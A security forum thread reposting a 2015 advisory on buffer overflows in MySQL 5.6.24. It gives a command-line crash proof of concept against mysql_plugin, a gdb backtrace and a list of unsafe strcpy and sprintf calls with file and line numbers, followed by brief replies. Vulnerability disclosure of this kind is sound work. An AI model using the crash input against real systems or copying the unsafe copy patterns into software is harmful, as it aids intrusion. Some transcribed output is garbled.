查看: 142517|回复: 554

MySQL 5.6.24 Buffer Overflow Vulnerability

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-10-8 13:56:22 | 显示全部楼层 |阅读模式
    Description:
    MySQL version 5.6.24 suffers from multiple buffer overflow vulnerabilities.

    [PHP] 纯文本查看 复制代码
    a888b.
                 d888888b.
                 8P"YP"Y88
                 8|o||o|88
                 8' -  .88
                 8`._.' Y8.
                d/      `8b.
               dP   .    Y8b.
              d8:'  "  `::88b
             d8"         'Y88b
            :8P    '      :888
             8a.   :     _a88P
           ._/"Yaa_:   .| 88P|
           \    YP"    `| 8P  `.
           /     \.___.d|    .'
           `--..__)888P`._.'
     
     
                               ~ Keeping Things Simple!
     
     
     
    MySQL v5.6.24 BUFFER OVERFLOWS
     
     
    Date: 07/10/2015
     
    Author: Nicholas Lemonias
     
    ============================================================
     
     
    ========================
    SUMMARY
    =========================
     
    During a manual source code audit of MYSQL Version 5.6.24, various
    buffer overflow issues have been realized.
     
     
     
    ===================
    TECHNICAL DETAILS
    ===================
     
     
    root@priv8: ~# /usr/bin/mysql_plugin ‘perl -e ‘print “X” x 9000"
     
    *** buffer overflow detected ***: mysql_plugin terminated
    ======= Backtrace: =========
    /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
    /lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]
    /lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a]
    /lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
       insecure call
    mysql_plugin(main+0x202)[0xb752ee22]
    /lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa63]
    mysql_plugin(+0xa90d)[0xb752f90d]
    ======= Memory map: ========
    b6800000-b6821000 nw-p 00000000 00:00
    b6821000-b6900000 ---p 00000000 00 00
    b699d000-b699e000 ---p 00000000 00:00
    b699e000-b71a1000 rw-p 00000000 00 00
    b71a1000-b7345000 r-xp 00000000 00:13 1673
    /lib/i386-linux-gnu/i686/cmov/libc-2.1
    9.50
     
    b7345000-b7347000 r-—p 001a4000 00:13 1673
    /lib/i386-linux~gnu/i686/cmov/libc-2.1
    9.so
     
    b7347000-b7348000 rw-p 00la6000 00:13 1673
    /lib/i386-linux-gnu/i686/cmov/libc-2.1
    9.so
     
    b7348000-b734b000 rw-p 00000000 00 00 0
     
    b734b000-b7367000 r-xp 00000000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
    b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
    b7368000—b73ac000 r-xp 00000000 00:13 15649
    /lib/i386-linux-gnu/1686/cmov/libm-2.1
    9.so
    bffc9000-c0000000 pw-p 00000000 00:00 0 [stack]
     
    Program received signal SIGABRT, Aborted.
    Oxb7fdebe0 in __kernel_vsyscall ()
    (gdb) bt
    #0 0xb7fdebe0 in __kernel_vsyscall ()
    #1 0xb7caa307 in __GI_raise (sig=sig@entry=6)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    #2 0xb7cab9c3 in __GI_abort () at abort.c:89
    #3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2,
    fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\n”)
    at ../sysdeps/posix/libc_fatal.c:175
    #4 0xb7d762d5 in __GI___fortify_fail (
    msg=msg@entry=0xb7ddbdd6 "buffer overflow detected”)
    at fortify_fail.c:31
    #5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
    #6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' <repeats 200 times>...,
    src=0xbffe96ed 'A' <repeats 200 times>..., destlen=<optimized out>)
    at strcpy_chk.c:60
    #7 0x80009e22 in main ()
     
    (gdb)
     
     
     
    (gdb) disas
    Dump of assembler code for function __kernel_vsyscall:
     
    0xb7fdebd0 <+0>: push %ecx
    0xb7fdebd1 <+1>: push %edx
    Oxb7fdebd2 <+2>: push %ebp
    Oxb7fdebd3 <+3>: mov %esp,%ebp
    0xb7fdebd5 <+5>: sysenter
    Oxb7fdebd7 <+7>: nop
     
    Oxb7fdebd8 <+8>: nop
     
    0xb7fdebd9 <+9>: nop
     
    Oxb7fdebda <+10>: nop
    Oxb7fdebdb <+11>: nop
    Oxb7fdebdc <+12>: nop
    Oxb7fdebdd <+13>: nop
    Oxb7fdebde <+14>: int x80
    => Oxb7fdebe0 <+16>: pop %ebp
    Oxb7fdebe1 <+17>: pop %edx
    0xb7fdebe2 <+18>: pop %ecx
    Oxb7fdebe3 <+19>: ret
    End of assembler dump.
     
    (gdb)
     
     
    ============================
    TECHNICAL SYNOPSIS / POC #2
    ============================
     
    Unsafe Use of strcpy; this can lead to a buffer overflow condition
     
     
    ----->
    /lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
     
    A user-supplied string from the command-line is copied to a fixed
    length destination buffer.
     
     
    -----------------[ mysql_plugin.c]-------------------------------
     
    Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
    strcpy(plugin_name, argv[i]);
     
     
    permission set:
     
    -rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin
     
    ===============================================
    MySQL V 5.6.24  VULNERABILITIES - SOURCE CODE
    ===============================================
     
     
    1. Insecure use of sprintf
     
     
    Vulnerability Description: A char*  type is copied to a fixed length
    destination  buffer. This could lead to a buffer overflow.
     
    Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c
     
    sprintf(efbuf, "MY_REG_%s", name);
     
    2.
     Unsafe Use of strcpy could lead to an overflow condition.
    Vulnerability Description: A user-supplied string from the
    command-line is copied to a fixed length destination buffer. This
    could lead to a buffer overflow.
     
    Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
    strcpy(plugin_name, argv[i]);
     
    3.
     Unsafe Use of strcpy  could  lead to an overflow condition.
    Vulnerability Description: A user-supplied string from the
    command-line is copied to a fixed length destination buffer. This
    could lead to a buffer overflow.
     
    Line: 797 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
    strcpy(config_file, argv[i]);
     
    4.
    Insecure use of sprintf.
    Vulnerability Description: A char*  type is being copied  to a fixed
    length destination  buffer. This could lead to a buffer overflow.
    Line: 544 - Filename: ../mysql/mysql-5.6.24/regex/main.c
    sprintf(grump, "matched null at `%.20s'", p);
     
    5.
    Insecure use of sprintf.
    Vulnerability Description: A char*  type is being copied to a fixed
    length destination buffer. This could lead to a buffer overflow.
    Line: 525 - Filename: ../mysql/mysql-5.6.24/regex/main.c
    sprintf(grump, "matched `%.*s'", len, p);
     
    6.
     Unsafe Use of strcpy  could  lead to an overflow condition.
    Vulnerability Description: A user-supplied string from the
    command-line is being copied to a fixed length destination buffer.
    This could lead to a buffer overflow.
    Line: 413 - Filename:
    ../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/dblqh/redoLogReader/reader.cpp
    strcpy(fileName, argv[1]);
     
    7.
    Insecure use of sprintf.
    Vulnerability Description: A char*  type is being copied  to a fixed
    length destination buffer. This could lead to a buffer overflow.
    Line: 531 - Filename: ../mysql/mysql-5.6.24/regex/main.c
    sprintf(grump, "matched `%.*s' instead", len, p);
     
    8.
    Insecure use of sprintf.
    Vulnerability Description: A char*  type is being copied  to a fixed
    length destination  buffer. This could lead to a buffer overflow.
    Line: 710 - Filename: ../mysql/mysql-5.6.24/client/mysqlshow.c
    sprintf(query,"select count(*) from `%s`", table);
     
     
    9.
    Insecure use of sprintf
    Vulnerability Description: A char*  type is being copied  to a fixed
    length destination  buffer. This could lead to a buffer overflow.
    Line: 121 - Filename: ../mysql/mysql-5.6.24/libmysql/conf_to_src.c
    sprintf(buf, "%s.conf", set);
     
     
    10.
     Unsafe Use of strcpy could  lead to an overflow condition.
    Vulnerability Description: A char*  type is being copied  to a fixed
    length destination  buffer. This could lead to a buffer overflow.
    Line: 784 - Filename:
    ../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/PosixAsyncFile.cpp
    strcpy(path, src);
     
     
    11.
     Unsafe Use of strcpy could lead to an overflow condition.
    Vulnerability Description: A char*  type is being copied  to a fixed
    length destination  buffer. This, could lead to an overflow.
    Line: 377 - Filename:
    ../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/Win32AsyncFile.cpp
    strcpy(path, src);
    <<<
    Size of PATH is PATH_MAX 256
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-10-9 23:43:05 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-3-5 19:13
  • 签到天数: 91 天

    [LV.6]常住居民II

    发表于 2015-10-9 23:45:24 | 显示全部楼层
    不解释一下作用?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-10 14:41
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-10-10 14:51:19 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-11 00:26:44 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-12 15:09:35 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-10-13 04:03:20 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-13 08:25:03 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-13 16:43:58 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-10-16 01:37:13 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 18:29 , Processed in 0.042666 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部